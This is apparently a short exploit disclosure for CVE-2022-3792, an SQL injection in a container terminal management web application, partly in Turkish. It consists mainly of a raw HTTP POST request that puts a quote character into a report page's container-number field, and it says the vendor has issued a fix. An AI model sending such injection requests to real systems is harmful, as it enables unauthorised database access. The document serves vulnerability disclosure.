CVE-2022-3792 Terminal Operation System

Exploit Title: CVE-2022-3792 Terminal Operation System Exploit Author:Ömer Yılmaz Fordefence.com

Team:Onur Savaş(Vxshellew) – Ömer Akincir(WASP)

CVE-ID: CVE-2022-3792

Vuln Details: SQL Injection

Post parametresi “MainContentTXTContainerNo” Syntax SQL injection Zafiyetli dosya “ContainerWeigherReceiptForGuest.aspx”

HTTP REQUEST

POST //View/Report/ContainerWeigherReceiptForGuest.aspx HTTP/1.1

Content-Length: 7543

Cache-Control: no-cache

X-Requested-With: XMLHttpRequest

X-MicrosoftAjax: Delta=true

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.91 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */*

Referer:

ctl00%24MainContent%24RadScriptManager2=ctl00%24MainContent%24ctl00%24

MainContent%24RadAjaxPanelPanel%7Cctl00%24MainContent%24btnList&ctl00_

MainContent_RadScriptManager2_TSM=&ctl00%24MainContent%24StartDatePicker=2022-12-16&ctl00%24MainContent%24StartDatePicker%24dateInput=16.12.2022&ctl00_

MainContent_StartDatePicker_calendar_SD=%5B%5D&ctl00_

MainContent_StartDatePicker_calendar_AD=%5B%5B1980%2C1%2C1%5D%2C%5B2099%2C12%2C30%5D%2C%5B2022%2C12%2C16%5D%5D&ctl00_

MainContent_StartDatePicker_dateInput_ClientStateD&ctl00_MainContent_StartDatePicker_ClientState=&ctl00%24MainContent%24EndDatePicker=&ctl00%24

MainContent%24EndDatePicker%24dateInput=16.12.2022&ctl00_MainContent_EndDatePicker_calendar_SD=%5D&ctl00_MainContent_EndDatePicker_calendar_AD=%5D&ctl00_

MainContent_EndDatePicker_dateInput_ClientState=&ctl00_MainContent_EndDatePicker_ClientState=&ctl00%24MainContent%24txtContainerno=‘&ctl00_

MainContent_vehicleGrid_ClientState=&__ASYNCPOST=true&RadAJAXControlID=ctl00

Söz konusu zafiyet ilgili firma tarafından hemen kapatılmış ve yeni güncelleme yayımlanmıştır.